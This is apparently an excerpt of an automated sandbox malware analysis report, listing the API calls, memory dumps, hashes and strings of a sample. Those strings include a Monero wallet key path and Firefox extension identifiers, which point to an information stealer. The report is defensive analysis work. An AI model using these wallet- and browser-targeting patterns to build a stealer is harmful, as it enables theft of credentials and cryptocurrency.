                                • Instruction ID: e89be59b5f21d0b84a00419fc10e3f9c6de35ff6afc83d4243486df7b854e1e0
                                • Opcode Fuzzy Hash: 87c29640be0da1af17a4502942744374cb2f9051dce6eaf438a313f6811d4b07
                                • Instruction Fuzzy Hash: 1B41DD71E102189ADF14EBA0D896BEEB774AF15300F404119E116AA192DF746A4AEFD2
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00089F41
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: f154a854584efd554e19b8a9eb7285bef967354f18d855cda6fb3378cbffff8c
                                • Instruction ID: 0c3277036ef0c40dc0c02859f83b0658d654f790406f208cfe476b0354f205f4
                                • Opcode Fuzzy Hash: f154a854584efd554e19b8a9eb7285bef967354f18d855cda6fb3378cbffff8c
                                • Instruction Fuzzy Hash: D4610D71A10248DBDF24EFA4CC96BEE77B5BF45300F048118F94A5F592EB706A06DB92
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,00D0DF08,00000000,00020119,?), ref: 000940F4
                                • RegQueryValueExA.ADVAPI32(?,00D0EDB0,00000000,00000000,00000000,000000FF), ref: 00094118
                                • RegCloseKey.ADVAPI32(?), ref: 00094122
                                • lstrcat.KERNEL32(?,00000000), ref: 00094147
                                • lstrcat.KERNEL32(?,00D0EC00), ref: 0009415B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                • Instruction ID: 50b276cea78cf827573cde4a01559659fc521300c690b37dc4eeecf2a91f2029
                                • Opcode Fuzzy Hash: bb0444b8925def8c62fa2a5b92dd591d1fc0907e19881c1130ae442f59dbe817
                                • Instruction Fuzzy Hash: 59418AB6D0010CABDB14FBA0FC4AFED777DBB48304F004558B61996182EA755B888B92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,00CFBE58,00000000,00020119,?), ref: 00097E5E
                                • RegQueryValueExA.ADVAPI32(?,00D0DDE8,00000000,00000000,000000FF,000000FF), ref: 00097E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00097E92
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                • Instruction ID: 6e78d685c8d12dbf8b987746416c7380a92a9b90525219f497b146144c52b597
                                • Opcode Fuzzy Hash: 97e6b3a30a2952cf67cc5fe4c7f8aabc12827a7508bd9c71f9ad01a8f38745c7
                                • Instruction Fuzzy Hash: 28115EB2A44209EBDB14CF95ED49FBFBBB8FB48B14F104259F605A7280D77458009BA2
                                APIs
                                • StrStrA.SHLWAPI(00D0E960,?,?,?,0009140C,?,00D0E960,00000000), ref: 0009926C
                                • lstrcpyn.KERNEL32(002CAB88,00D0E960,00D0E960,?,0009140C,?,00D0E960), ref: 00099290
                                • lstrlen.KERNEL32(?,?,0009140C,?,00D0E960), ref: 000992A7
                                • wsprintfA.USER32 ref: 000992C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                • Instruction ID: df86f365501934db64641b33b05ace10a5ce835e9c9abfd6e55ed643a7c372f6
                                • Opcode Fuzzy Hash: 0a92012b317c680d6c53b0401e8c9ac34ebd90da366eefed03eedccfa2ffe91f
                                • Instruction Fuzzy Hash: 3501937550010CFFCB04DFECD988EAE7BB9EF58358F148248F9099B244C635AA509B91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000812B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 000812BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000812D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000812F5
                                • RegCloseKey.ADVAPI32(?), ref: 000812FF
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                • Instruction ID: 7d006b3fc34906dcd3f97ed2a761d8170b98febb221998c3d0b58e799149703c
                                • Opcode Fuzzy Hash: 64b78107429f73a689f237cb337e5e19aae0f460e4dedc479861fd3482634838
                                • Instruction Fuzzy Hash: 1B01CDB9A4020CBBDB14DFE4EC4DFAEB7B8FB48705F108159FA0597280DA759A058B51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: bf243e2056a99847b97a0ed59b80adaffd3ed7020bdaf829de2f4f619130c3e6
                                • Instruction ID: 8729c89df01809fdca91195b4f9cc02226c6f373be00ed92c284a2a3d562faf4
                                • Opcode Fuzzy Hash: bf243e2056a99847b97a0ed59b80adaffd3ed7020bdaf829de2f4f619130c3e6
                                • Instruction Fuzzy Hash: 9B41D7B190079C5EEF318B24CD99FFBBBE89F45704F1444E8E9CA86182D2719A44EF60
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00096663
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00096726
                                • ExitProcess.KERNEL32 ref: 00096755
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                • Instruction ID: 5068a3c48af066a837e5bfa3ecb44a157c04fabf981fcddf2c17d6b2737fec70
                                • Opcode Fuzzy Hash: 69897c8bd0e75c587de9ae86e314d6ef9e31c6e2fc478cd6361f3a865c417bdd
                                • Instruction Fuzzy Hash: BB314FB1D01218ABDB14EB90DC96FDEB778AF04300F404189F30A66192DF746B49DFAA
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,000A0E28,00000000,?), ref: 0009882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098836
                                • wsprintfA.USER32 ref: 00098850
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                • Instruction ID: 879a9f0c313e59f4581bea3ae116c8b1263dd94774be4561b54cd162b332f8b6
                                • Opcode Fuzzy Hash: 51fc1c880ead9c8b72d052df01df006b059c443a8d0685ca38d1e37b32abf42b
                                • Instruction Fuzzy Hash: 6F210DB1E44208AFDB04DFD4ED49FAEBBB8FB49715F104219F605A7290C779A901CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0009951E,00000000), ref: 00098D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00098D62
                                • wsprintfW.USER32 ref: 00098D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                • Instruction ID: 19472a941a6435e7f3fb3319c938c7fb8a8618dd243d754d66cad4a99d0d7e6c
                                • Opcode Fuzzy Hash: d5357653e6c0044a628c738429191ab1f5131ae15703216ae668bc014dd009e2
                                • Instruction Fuzzy Hash: FAE08CB0A4020CBBD700DBD4EC0EE6DB7B8EB0470AF000195FE0987280DA719E008B96
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0008A3FF
                                • lstrlen.KERNEL32(00000000), ref: 0008A6BC
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 0008A743
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                • Instruction ID: 0951a69f88985f8cc737806bacd5365ea56854e4ac75fe9c43b6514d6420fe25
                                • Opcode Fuzzy Hash: a254debb05e908b7fd19d9a590751c41f68b651aa77a52c8cb1d3d3f26ea5866
                                • Instruction Fuzzy Hash: 74E1CC72A201189BDF05FBA4EC96EEE7338BF15300F508159F51676092EF306A4DDBA6
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D481
                                • lstrlen.KERNEL32(00000000), ref: 0008D698
                                • lstrlen.KERNEL32(00000000), ref: 0008D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 0008D72B
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                • Instruction ID: ee45d612faf7cadd3d3a8838ef3ec733ddccce63551cc7cb03936c3a6fd22d2e
                                • Opcode Fuzzy Hash: d29c07259d55355d42f0dae2e47215566039dcde89dd2e05873ace5e9027a032
                                • Instruction Fuzzy Hash: 4391FE72A101189BDF04FBA4ED96EEE7338BF15304F504169F517A6092EF346A09DBA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 00098B60: GetSystemTime.KERNEL32(000A0E1A,00D0E0B0,000A05AE,?,?,000813F9,?,0000001A,000A0E1A,00000000,?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 00098B86
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0008D801
                                • lstrlen.KERNEL32(00000000), ref: 0008D99F
                                • lstrlen.KERNEL32(00000000), ref: 0008D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 0008DA32
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                • Instruction ID: f7339bb11165456b1b673d0d827a205b40c1856f36a8095c4cc1f9cd384d5e44
                                • Opcode Fuzzy Hash: 023b283c35af119896501a62402d2f16bd8e9baf5325127574e4770984287ccd
                                • Instruction Fuzzy Hash: CE81E072A201189BDF04FBA4DD96EEE7338BF15304F504519F507A6092EF346A09DBE2
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000899EC
                                  • Part of subcall function 000899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00089A11
                                  • Part of subcall function 000899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00089A31
                                  • Part of subcall function 000899C0: ReadFile.KERNEL32(000000FF,?,00000000,0008148F,00000000), ref: 00089A5A
                                  • Part of subcall function 000899C0: LocalFree.KERNEL32(0008148F), ref: 00089A90
                                  • Part of subcall function 000899C0: CloseHandle.KERNEL32(000000FF), ref: 00089A9A
                                  • Part of subcall function 00098E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00098E52
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,000A1580,000A0D92), ref: 0008F54C
                                • lstrlen.KERNEL32(00000000), ref: 0008F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                • Instruction ID: f9e54f50083f9293a16a88ea813a76598e8568c27f091899f383787a14d22eb1
                                • Opcode Fuzzy Hash: e6be56e24154a9dc7a4dd05c49663974d62670ee41f964f1cc4b9e5c165c9959
                                • Instruction Fuzzy Hash: A151CE71E10108AADF04FBB4DC96DEE7379AF55300F408529F916A6192EE346A09DBE2
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0009718C
                                • s, xrefs: 000972AE, 00097179, 0009717C
                                • s, xrefs: 00097111
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 3722407311-1849715570
                                • Opcode ID: 2fee3748df01bd3633ed3be38db308778224d113e3534b6e73be93ce33250ba9
                                • Instruction ID: 089cc6fa539580fec51f09c1ff62cb9c976734b34e9efca58e6868c9201ab85c
                                • Opcode Fuzzy Hash: 2fee3748df01bd3633ed3be38db308778224d113e3534b6e73be93ce33250ba9
